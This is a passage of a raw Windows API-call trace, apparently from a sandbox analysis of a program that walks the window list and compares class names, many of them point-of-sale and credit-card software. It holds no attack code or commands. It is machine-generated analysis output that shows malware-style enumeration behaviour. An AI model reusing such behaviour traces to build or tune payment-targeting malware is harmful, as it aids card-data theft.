returned 16 [0232.005] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.005] GetWindow (hWnd=0x100f4, uCmd=0x2) returned 0x100f8 [0232.005] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.005] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.005] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x100a0 [0232.005] GetClassNameA (in: hWnd=0x100a0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0232.005] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.005] GetWindow (hWnd=0x100a0, uCmd=0x2) returned 0x1021e [0232.005] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ATL:00007FFCEDC97230") returned 20 [0232.005] lstrcmpA (lpString1="ATL:00007FFCEDC97230", lpString2="ThunderRT6Main") returned -1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0232.005] GetWindow (hWnd=0x1021e, uCmd=0x2) returned 0x10114 [0232.005] GetClassNameA (in: hWnd=0x10114, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0232.005] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0232.005] GetWindow (hWnd=0x10114, uCmd=0x2) returned 0x10102 [0232.005] GetClassNameA (in: hWnd=0x10102, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0232.005] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0232.005] GetWindow (hWnd=0x10102, uCmd=0x2) returned 0x1032c [0232.005] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0232.005] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0232.005] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.005] GetWindowLongA (hWnd=0x1032c, nIndex=-16) returned -1946157056 [0232.005] GetWindowLongPtrA (hWnd=0x1032c, nIndex=-6) returned 0x0 [0232.005] GetWindowLongPtrA (hWnd=0x1032c, nIndex=-6) returned 0x0 [0232.005] GetWindow (hWnd=0x1032c, uCmd=0x2) returned 0x102ee [0232.005] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.006] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.006] GetWindowThreadProcessId (in: hWnd=0x102ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.006] GetWindowLongA (hWnd=0x102ee, nIndex=-16) returned -1946157056 [0232.006] GetWindowLongPtrA (hWnd=0x102ee, nIndex=-6) returned 0x7ff688e30000 [0232.006] GetWindowLongPtrA (hWnd=0x102ee, nIndex=-6) returned 0x7ff688e30000 [0232.006] GetWindow (hWnd=0x102ee, uCmd=0x2) returned 0x10306 [0232.006] GetClassNameA (in: hWnd=0x10306, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0232.006] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0232.006] GetWindowThreadProcessId (in: hWnd=0x10306, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.006] GetWindowLongA (hWnd=0x10306, nIndex=-16) returned 399441920 [0232.006] GetWindowLongPtrA (hWnd=0x10306, nIndex=-6) returned 0x7ffce7990000 [0232.006] GetWindowLongPtrA (hWnd=0x10306, nIndex=-6) returned 0x7ffce7990000 [0232.006] GetWindow (hWnd=0x10306, uCmd=0x2) returned 0x70038 [0232.006] GetClassNameA (in: hWnd=0x70038, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0232.006] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0232.006] GetWindowThreadProcessId (in: hWnd=0x70038, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.006] GetWindowLongA (hWnd=0x70038, nIndex=-16) returned 131006464 [0232.006] GetWindowLongPtrA (hWnd=0x70038, nIndex=-6) returned 0x7ffce7990000 [0232.006] GetWindowLongPtrA (hWnd=0x70038, nIndex=-6) returned 0x7ffce7990000 [0232.006] GetWindow (hWnd=0x70038, uCmd=0x2) returned 0x60040 [0232.006] GetClassNameA (in: hWnd=0x60040, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0232.006] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0232.006] GetWindowThreadProcessId (in: hWnd=0x60040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.006] GetWindowLongA (hWnd=0x60040, nIndex=-16) returned -1946157056 [0232.006] GetWindowLongPtrA (hWnd=0x60040, nIndex=-6) returned 0x7ffce0820000 [0232.006] IsWindowEnabled (hWnd=0x60040) returned 0 [0232.006] GetPropA (hWnd=0x60040, lpString=0xc10a) returned 0x1 [0232.006] RemovePropA (hWnd=0x60040, lpString=0xc10a) returned 0x1 [0232.006] EnableWindow (hWnd=0x60040, bEnable=1) returned 1 [0232.006] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0xa, wParam=0x1, lParam=0x0) returned 0x0 [0232.006] GetWindow (hWnd=0x60040, uCmd=0x2) returned 0x1033c [0232.006] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MsoStdCompMgr") returned 13 [0232.007] lstrcmpA (lpString1="MsoStdCompMgr", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x1033c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.007] GetWindowLongA (hWnd=0x1033c, nIndex=-16) returned -2080374784 [0232.007] GetWindowLongPtrA (hWnd=0x1033c, nIndex=-6) returned 0x7ffce5e40000 [0232.007] GetWindowLongPtrA (hWnd=0x1033c, nIndex=-6) returned 0x7ffce5e40000 [0232.007] GetWindow (hWnd=0x1033c, uCmd=0x2) returned 0x10300 [0232.007] GetClassNameA (in: hWnd=0x10300, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0232.007] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x10300, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x100c [0232.007] GetWindow (hWnd=0x10300, uCmd=0x2) returned 0x1032e [0232.007] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0232.007] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x1032e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.007] GetWindowLongA (hWnd=0x1032e, nIndex=-16) returned -2080374784 [0232.007] GetWindowLongPtrA (hWnd=0x1032e, nIndex=-6) returned 0x7ffd08f10000 [0232.007] GetWindowLongPtrA (hWnd=0x1032e, nIndex=-6) returned 0x7ffd08f10000 [0232.007] GetWindow (hWnd=0x1032e, uCmd=0x2) returned 0x10308 [0232.007] GetClassNameA (in: hWnd=0x10308, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="_WwO") returned 4 [0232.007] lstrcmpA (lpString1="_WwO", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x10308, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.007] GetWindowLongA (hWnd=0x10308, nIndex=-16) returned -2080374784 [0232.007] GetWindowLongPtrA (hWnd=0x10308, nIndex=-6) returned 0x7ffce7990000 [0232.007] GetWindowLongPtrA (hWnd=0x10308, nIndex=-6) returned 0x7ffce7990000 [0232.007] GetWindow (hWnd=0x10308, uCmd=0x2) returned 0x102f0 [0232.007] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ARC Event Window 00") returned 19 [0232.007] lstrcmpA (lpString1="ARC Event Window 00", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x102f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.007] GetWindowLongA (hWnd=0x102f0, nIndex=-16) returned -2080374784 [0232.007] GetWindowLongPtrA (hWnd=0x102f0, nIndex=-6) returned 0x7ff688e30000 [0232.007] GetWindowLongPtrA (hWnd=0x102f0, nIndex=-6) returned 0x7ff688e30000 [0232.007] GetWindow (hWnd=0x102f0, uCmd=0x2) returned 0x502ec [0232.007] GetClassNameA (in: hWnd=0x502ec, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ARC Event Window 00") returned 19 [0232.007] lstrcmpA (lpString1="ARC Event Window 00", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x502ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0232.007] GetWindowLongA (hWnd=0x502ec, nIndex=-16) returned -2080374784 [0232.007] GetWindowLongPtrA (hWnd=0x502ec, nIndex=-6) returned 0x7ff688e30000 [0232.007] GetWindowLongPtrA (hWnd=0x502ec, nIndex=-6) returned 0x7ff688e30000 [0232.007] GetWindow (hWnd=0x502ec, uCmd=0x2) returned 0x102de [0232.007] GetClassNameA (in: hWnd=0x102de, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.007] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.007] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1078 [0232.008] GetWindow (hWnd=0x102de, uCmd=0x2) returned 0x202dc [0232.008] GetClassNameA (in: hWnd=0x202dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Ataclass") returned 8 [0232.008] lstrcmpA (lpString1="Ataclass", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x202dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1078 [0232.008] GetWindow (hWnd=0x202dc, uCmd=0x2) returned 0x102da [0232.008] GetClassNameA (in: hWnd=0x102da, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.008] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1064 [0232.008] GetWindow (hWnd=0x102da, uCmd=0x2) returned 0x202d8 [0232.008] GetClassNameA (in: hWnd=0x202d8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="scubaKennethCoupledapp") returned 22 [0232.008] lstrcmpA (lpString1="scubaKennethCoupledapp", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x202d8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1064 [0232.008] GetWindow (hWnd=0x202d8, uCmd=0x2) returned 0x102d6 [0232.008] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.008] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x102d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1050 [0232.008] GetWindow (hWnd=0x102d6, uCmd=0x2) returned 0x202d4 [0232.008] GetClassNameA (in: hWnd=0x202d4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Stable_strength_window") returned 22 [0232.008] lstrcmpA (lpString1="Stable_strength_window", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x202d4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1050 [0232.008] GetWindow (hWnd=0x202d4, uCmd=0x2) returned 0x102d2 [0232.008] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.008] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x103c [0232.008] GetWindow (hWnd=0x102d2, uCmd=0x2) returned 0x202cc [0232.008] GetClassNameA (in: hWnd=0x202cc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="occurs_Combat_burlington_window") returned 31 [0232.008] lstrcmpA (lpString1="occurs_Combat_burlington_window", lpString2="ThunderRT6Main") returned -1 [0232.008] GetWindowThreadProcessId (in: hWnd=0x202cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x103c [0232.008] GetWindow (hWnd=0x202cc, uCmd=0x2) returned 0x102ce [0232.008] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.008] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1028 [0232.009] GetWindow (hWnd=0x102ce, uCmd=0x2) returned 0x202ca [0232.009] GetClassNameA (in: hWnd=0x202ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OrganisationClosestspiritualwindow") returned 34 [0232.009] lstrcmpA (lpString1="OrganisationClosestspiritualwindow", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x202ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1028 [0232.009] GetWindow (hWnd=0x202ca, uCmd=0x2) returned 0x102c6 [0232.009] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="utg2window") returned 10 [0232.009] lstrcmpA (lpString1="utg2window", lpString2="ThunderRT6Main") returned 1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1014 [0232.009] GetWindow (hWnd=0x102c6, uCmd=0x2) returned 0x102c8 [0232.009] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.009] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1014 [0232.009] GetWindow (hWnd=0x102c8, uCmd=0x2) returned 0x102c2 [0232.009] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="spgagentservicecls") returned 18 [0232.009] lstrcmpA (lpString1="spgagentservicecls", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf8 [0232.009] GetWindow (hWnd=0x102c2, uCmd=0x2) returned 0x202c4 [0232.009] GetClassNameA (in: hWnd=0x202c4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.009] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x202c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf8 [0232.009] GetWindow (hWnd=0x202c4, uCmd=0x2) returned 0x202bc [0232.009] GetClassNameA (in: hWnd=0x202bc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="spcwin_app") returned 10 [0232.009] lstrcmpA (lpString1="spcwin_app", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x202bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa6c [0232.009] GetWindow (hWnd=0x202bc, uCmd=0x2) returned 0x202c0 [0232.009] GetClassNameA (in: hWnd=0x202c0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.009] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.009] GetWindowThreadProcessId (in: hWnd=0x202c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa6c [0232.009] GetWindow (hWnd=0x202c0, uCmd=0x2) returned 0x202b8 [0232.009] GetClassNameA (in: hWnd=0x202b8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="omniposclass") returned 12 [0232.010] lstrcmpA (lpString1="omniposclass", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x202b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x688 [0232.010] GetWindow (hWnd=0x202b8, uCmd=0x2) returned 0x102be [0232.010] GetClassNameA (in: hWnd=0x102be, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.010] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x688 [0232.010] GetWindow (hWnd=0x102be, uCmd=0x2) returned 0x202b4 [0232.010] GetClassNameA (in: hWnd=0x202b4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="mxslipstream_cls") returned 16 [0232.010] lstrcmpA (lpString1="mxslipstream_cls", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf9c [0232.010] GetWindow (hWnd=0x202b4, uCmd=0x2) returned 0x102ba [0232.010] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.010] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x102ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf9c [0232.010] GetWindow (hWnd=0x102ba, uCmd=0x2) returned 0x202b0 [0232.010] GetClassNameA (in: hWnd=0x202b0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="issposwnd") returned 9 [0232.010] lstrcmpA (lpString1="issposwnd", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x202b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf08 [0232.010] GetWindow (hWnd=0x202b0, uCmd=0x2) returned 0x102b6 [0232.010] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.010] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x102b6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf08 [0232.010] GetWindow (hWnd=0x102b6, uCmd=0x2) returned 0x202ac [0232.010] GetClassNameA (in: hWnd=0x202ac, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="fposwin") returned 7 [0232.010] lstrcmpA (lpString1="fposwin", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x202ac, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb0 [0232.010] GetWindow (hWnd=0x202ac, uCmd=0x2) returned 0x102b2 [0232.010] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.010] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.010] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb0 [0232.011] GetWindow (hWnd=0x102b2, uCmd=0x2) returned 0x102aa [0232.011] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="edcsvr_app") returned 10 [0232.011] lstrcmpA (lpString1="edcsvr_app", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd0c [0232.011] GetWindow (hWnd=0x102aa, uCmd=0x2) returned 0x102ae [0232.011] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.011] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd0c [0232.011] GetWindow (hWnd=0x102ae, uCmd=0x2) returned 0x202a4 [0232.011] GetClassNameA (in: hWnd=0x202a4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="creditservice_win") returned 17 [0232.011] lstrcmpA (lpString1="creditservice_win", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x202a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf4 [0232.011] GetWindow (hWnd=0x202a4, uCmd=0x2) returned 0x202a8 [0232.011] GetClassNameA (in: hWnd=0x202a8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.011] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x202a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf4 [0232.011] GetWindow (hWnd=0x202a8, uCmd=0x2) returned 0x202a0 [0232.011] GetClassNameA (in: hWnd=0x202a0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="centralcreditcard_app") returned 21 [0232.011] lstrcmpA (lpString1="centralcreditcard_app", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2c0 [0232.011] GetWindow (hWnd=0x202a0, uCmd=0x2) returned 0x102a6 [0232.011] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.011] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x102a6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2c0 [0232.011] GetWindow (hWnd=0x102a6, uCmd=0x2) returned 0x2029e [0232.011] GetClassNameA (in: hWnd=0x2029e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ccv_serverclass") returned 15 [0232.011] lstrcmpA (lpString1="ccv_serverclass", lpString2="ThunderRT6Main") returned -1 [0232.011] GetWindowThreadProcessId (in: hWnd=0x2029e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa14 [0232.011] GetWindow (hWnd=0x2029e, uCmd=0x2) returned 0x102a2 [0232.011] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.012] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x102a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa14 [0232.012] GetWindow (hWnd=0x102a2, uCmd=0x2) returned 0x1029a [0232.012] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="aldelo_") returned 7 [0232.012] lstrcmpA (lpString1="aldelo_", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x1029a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda0 [0232.012] GetWindow (hWnd=0x1029a, uCmd=0x2) returned 0x1029c [0232.012] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.012] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x1029c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda0 [0232.012] GetWindow (hWnd=0x1029c, uCmd=0x2) returned 0x10296 [0232.012] GetClassNameA (in: hWnd=0x10296, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="afr38_") returned 6 [0232.012] lstrcmpA (lpString1="afr38_", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x10296, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdc8 [0232.012] GetWindow (hWnd=0x10296, uCmd=0x2) returned 0x20298 [0232.012] GetClassNameA (in: hWnd=0x20298, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.012] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x20298, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdc8 [0232.012] GetWindow (hWnd=0x20298, uCmd=0x2) returned 0x10292 [0232.012] GetClassNameA (in: hWnd=0x10292, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="accupos_wnd") returned 11 [0232.012] lstrcmpA (lpString1="accupos_wnd", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x10292, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0232.012] GetWindow (hWnd=0x10292, uCmd=0x2) returned 0x20294 [0232.012] GetClassNameA (in: hWnd=0x20294, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.012] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x20294, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0232.012] GetWindow (hWnd=0x20294, uCmd=0x2) returned 0x2028e [0232.012] GetClassNameA (in: hWnd=0x2028e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="active-charge_cls") returned 17 [0232.012] lstrcmpA (lpString1="active-charge_cls", lpString2="ThunderRT6Main") returned -1 [0232.012] GetWindowThreadProcessId (in: hWnd=0x2028e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x590 [0232.013] GetWindow (hWnd=0x2028e, uCmd=0x2) returned 0x20290 [0232.013] GetClassNameA (in: hWnd=0x20290, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.013] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x20290, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x590 [0232.013] GetWindow (hWnd=0x20290, uCmd=0x2) returned 0x20288 [0232.013] GetClassNameA (in: hWnd=0x20288, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="yahoomessengerwin") returned 17 [0232.013] lstrcmpA (lpString1="yahoomessengerwin", lpString2="ThunderRT6Main") returned 1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x20288, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd78 [0232.013] GetWindow (hWnd=0x20288, uCmd=0x2) returned 0x1028c [0232.013] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.013] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x1028c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd78 [0232.013] GetWindow (hWnd=0x1028c, uCmd=0x2) returned 0x20284 [0232.013] GetClassNameA (in: hWnd=0x20284, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: 